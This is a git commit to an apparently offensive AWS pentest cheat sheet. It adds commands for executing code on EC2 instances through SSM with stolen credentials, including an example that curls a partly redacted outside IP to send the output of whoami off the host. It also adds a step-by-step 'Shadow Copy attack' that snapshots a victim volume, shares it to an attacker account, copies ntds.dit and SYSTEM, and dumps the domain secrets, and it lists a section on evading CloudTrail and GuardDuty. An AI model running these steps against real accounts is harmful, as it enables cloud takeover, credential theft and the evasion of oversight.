AWS SSM + Shadow copy attack

This commit is contained in:
Swissky 2020-03-06 15:30:38 +01:00
parent 5d87804f71
commit 1f3a94ba88

View File

@ -18,6 +18,7 @@
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) * [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
* [AWS - SSM - Command execution](#aws---ssm---command-execution) * [AWS - SSM - Command execution](#aws---ssm---command-execution)
* [AWS - Golden SAML Attack](#aws---golden-saml-attack) * [AWS - Golden SAML Attack](#aws---golden-saml-attack)
* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) * [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
* [PenTest:IAMUser/KaliLinux](#) * [PenTest:IAMUser/KaliLinux](#)
* [PenTest:IAMUser/ParrotLinux](#) * [PenTest:IAMUser/ParrotLinux](#)
@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
## AWS - SSM - Command execution ## AWS - SSM - Command execution
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
* Windows Server 2016 and 2019
* Amazon Linux
* Amazon Linux 2
* Ubuntu Server 16.04
* Ubuntu Server 18.04
* Amazon ECS-Optimized
```powershell ```powershell
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 $ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds $ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds $ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
e.g:
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
``` ```
## AWS - Golden SAML Attack ## AWS - Golden SAML Attack
@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
``` ```
## AWS - Shadow Copy attack
Prerequisite:
* EC2:CreateSnapshot
* CloudCopy - https://github.com/Static-Flow/CloudCopy
1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
2. Run `"Describe-Instances"` and show in list for attacker to select
3. Run `"Create-Snapshot"` on volume of selected instance
4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
5. Load AWS CLI with Attacker Credentials
6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
7. Ssh run `"sudo mkdir /windows"`
8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.